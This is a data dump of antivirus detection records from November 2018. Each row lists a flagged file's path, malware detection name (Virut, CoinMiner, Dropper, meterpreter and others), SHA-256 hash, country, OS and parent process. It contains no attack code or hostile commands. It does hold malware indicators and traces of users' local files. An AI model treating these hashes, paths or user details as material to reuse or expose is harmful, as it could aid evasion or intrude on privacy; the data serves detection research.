  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\oplata\\Zec Miner 0.3.4b\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T15:46:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T22:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000240f6', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000240f6', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:44:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='gpestn 2013.exe', filepath='i:\\pro evolution soccer 2013 caf 4\\kitserver13\\data\\switches\\versions\\1.04\\gPESTN 2013.exe', filesize=20032000, name='W32/Ramnit.CD.#M1.#R1'), hash='11dc5e691fa1b79305f7734155dc84584a6ed6142c048ebd33b3f97fc6be8386', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:40:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00024450', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp00024450', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:52:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\WinMinerPortable\\AppData\\Miners\\EWBF64_0.3.4\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tIghA2oGhkWtI\\\\\\/S6.1', country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T03:58:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zemax.exe', filepath='\\\\?\\E:\\迅雷下载\\Zemax V13 R2 SP4 x64\\z132sp4_x64_crack\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='5dd017a7cf6dd69056bbd2dbef9d18fc224217d502c25efd60e1504f47b24705', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:22:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-123657-9d02a8c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_559ae668\\AVSCAN-20181104-123622-98B47BB5\\AVSCAN-20181104-123657-9D02A8C7', filesize=128000, name='TR/Onlinegames.993.#M1.#R1'), hash='35b26007a3eef722e9d4fe59ccbbcaa35c6b43486b8d578c211ae171ed865fec', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:36:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132004-3f36e37c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132004-3F36E37C', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:22:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='lostfile_jpg_270476504..jpg', filepath='D:\\E Drive\\Asus A\\Lost Files\\LostFile_JPG_270476504..jpg', filesize=128000, name='DR/FakePic.Gen.#M1.#R1'), hash='d18de92fa4e8a0e23daa433b27756deb88674aadc7d8343ba2ca86bb32d50dbe', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\GetData\\Recover My Files v6\\RecoverMyFiles.exe', parentsize=67515248, timestamp='2018-11-04T05:18:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:26:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='c:\\windows\\system32\\searchprotocolhost.exe', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='9889486a0a57ff8c858a9629729b4feacf47aa9f28ff1440d3f9cebfd5292acb', metadata=Row(cmdline='Global\\\\UsGthrFltPipeMssGthrPipe25_ Global\\\\UsGthrCtrlFltPipeMssGthrPipe25 1 -2147483646 \\"Software\\\\Microsoft\\\\Windows Search\\" \\"Mozilla\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\" \\"C:\\\\ProgramData\\\\Microsoft\\\\Search\\\\Data\\\\Temp\\\\usgthrsvc\\" \\"DownLevelDaemon\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-04T10:51:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-125802-3d58cb64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-125802-3D58CB64', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:58:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008fb9a', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008fb9a', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0015da81', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp0015da81', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T11:44:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:56:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T17:45:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0000d44e', filepath='C:\\Windows\\Temp\\0051dda5-b79b-4f6d-87af-ca7d7e5d893c\\tmp0000057b\\tmp0000d44e', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='18323cac6d3330283a32095d084a52b9d252840965517c54b1c9a6969bed9c3f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-04T11:03:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:49:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225930-2f0a1406', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_62967912\\AVSCAN-20181104-224358-67F8C2A6\\AVSCAN-20181104-225930-2F0A1406', filesize=12000, name='Nov30.#M1.#R1'), hash='9da8699ce85f97347bb6c9c6b1f1d7bcb0e6d696784f598895997fe7c3d72edc', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:59:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Neshta.A.#M1.#R1'), hash='6f89e7e102f825264049fb2af1bce6683c799807cf5520697777232a3d589fd1', metadata=Row(cmdline='-k localservicenetworkrestricted -p -s wscsvc', country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=44520, timestamp='2018-11-04T15:49:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T20:31:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp001f8d3e', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp001f8d3e', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T12:32:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filepath='C:\\Users\\X\\AppData\\Roaming\\Apple Computer\\MobileSync\\Backup\\7ae31f6cc9795fd2a07cdede1da8b3c615ad2198\\Snapshot\\0c\\0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filesize=8000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c631e34853300c094c5bac5c053ce94c5f390be817cca0813fc677f1f123291d', metadata=Row(cmdline='--pipe \\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\30700532-878790086411040', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Common Files\\Apple\\Mobile Device Support\\AppleMobileBackup.exe', parentsize=67896, timestamp='2018-11-04T04:20:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T16:10:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-211228-dde91f52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28852188\\AVSCAN-20181104-204551-BE17A931\\AVSCAN-20181104-211228-DDE91F52', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:12:31Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T22:47:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='to trinh bau bttndan.exe', filepath='G:\\\xa0\\HOI NGHI 2017\\TO TRINH BAU BTTNDAN.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='671529e197693aa9b48d4480ef080e84f0cc182f3587bffbf91c6388f468d1e0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-04T10:52:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00000865', filepath='C:\\Windows\\Temp\\tmp00000462\\tmp00000865', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:52:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130054-545b1313', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_613104b7\\AVSCAN-20181104-125452-2406B856\\AVSCAN-20181104-130054-545B1313', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:00:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-215309-d792d750', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_26d84b62\\AVSCAN-20181104-215049-C8D3C2DA\\AVSCAN-20181104-215309-D792D750', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:53:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-181019-80a48f3f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be05e77\\AVSCAN-20181104-180957-7C5028F5\\AVSCAN-20181104-181019-80A48F3F', filesize=2176000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='86de3d5dc1678919598aab07ecffaaeaf0e05b1b907a73d8b2d933d7fccd3095', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T17:10:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-02T13:04:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='kuotpwpv.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\kuotPWPv.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bc4bcb8bdc74fc000a5dd5be97a4d41871bbe9834b2953650650f88f3a517c9b.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\BC4BCB8BDC74FC000A5DD5BE97A4D41871BBE9834B2953650650F88F3A517C9B.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bc4bcb8bdc74fc000a5dd5be97a4d41871bbe9834b2953650650f88f3a517c9b', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:56:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123857-6274ad99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67523b18\\AVSCAN-20181102-123847-5FEDE2B5\\AVSCAN-20181102-123857-6274AD99', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='LT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:38:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101903-96e1bc9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101903-96E1BC9F', filesize=64000, name='TR/Agent.64000.116.#M1.#R1'), hash='78fda789cdedfc745466d5fecd1dc02f6320d517cd7c10742964338d3e79d4a9', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:18:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='italian.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\LANGUAGE\\ITALIAN\\ITALIAN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e82b3935870df0344fbde79f0ab41a998ccb9c9cace45fd749bac407960e27e4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tutoriel handling + telechargement handling realiste.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\7zocfda6829\\tutoriel handling + telechargement handling realiste.exe', filesize=1920000, name='HEUR/APC.#M1.#R1'), hash='b89442f5eafd18a34f7f11922df0a94472ea963498fdda5a594c95d34771dfa4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\7-Zip\\7zFM.exe', parentsize=838656, timestamp='2018-11-02T22:30:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T03:52:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ce0840c544b73dfca4a44f9b2118657b01ed0c790065af4dec89d3f1972202a5', metadata=Row(cmdline='\\\\\\/Embedding', country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-02T13:15:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='windowsupdate32.exe', filepath='\\\\?\\C:\\ProgramData\\WindowsUpdater\\WindowsUpdate32.exe', filesize=1600000, name='HEUR/AGEN.1004477.#M1.#R1'), hash='c7d7d681204eba799032f293c34dc6923a94286ac5c59e554a23436055a7ae2a', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:28:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7ff5f3cb-724a-dc3b-bfc8-8e038063ed89.exe', filepath='E:\\{9d4c412b-f3fa-2614-8600-0788db27ddb2}\\7ff5f3cb-724a-dc3b-bfc8-8e038063ed89.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2378240, timestamp='2018-11-02T02:26:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vc harrier.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\HARRIER\\VC harrier\\VC harrier.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ce1fa5f4261acdae33a4cef7e6589fdda75ea01b63a6a7e8598dd4f1ebc5c45f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hpqemlsz.exe', filepath='C:\\Program Files\\HP\\Digital Imaging\\bin\\hpqEmlsz.exe', filesize=208000, name='W32/Infector.Gen.#M300.#R7863'), hash='b27fd6d9d2d1258e55c8d4ee6cc12716563a84353bd92ba692613b07886e5106', metadata=Row(cmdline='-u -p 5300 -s 140', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\WerFault.exe', parentsize=360448, timestamp='2018-11-02T17:15:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adberdr707_es_es.exe', filepath='\\\\anomianas\\share\\materiale studio\\trashbox\\forniture\\METALCO\\metalco_cataloghi\\escofet (e)\\AdbeRdr707_es_ES.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='92c5a8c64f484d6f0a5c46717053153e82fbef2ae324e33474f22c7704fb7a26', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:CXsIGuRX906lzRI6.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T10:23:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='meterpreter-32_c17a8b79.exe', filepath='C:\\metasploit-framework\\meterpreter-32_c17a8b79.exe', filesize=256000, name='TR/Crypt.XPACK.Gen.#M300.#R510'), hash='9792e43437f8d5f0f64f2164d17a1eb3481b776e36d0c4275fada175c9ae7803', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T10:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-042912-95c9e87b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c0d56b47\\AVSCAN-20181102-042845-91F28982\\AVSCAN-20181102-042912-95C9E87B', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='b9aa769660dea8fe55fb82e7fbdb92ad424e01ab4f8865266122e70fd0418051', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:27:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:12:08Z'), dt=datetime.date(2018, 11, 2)),
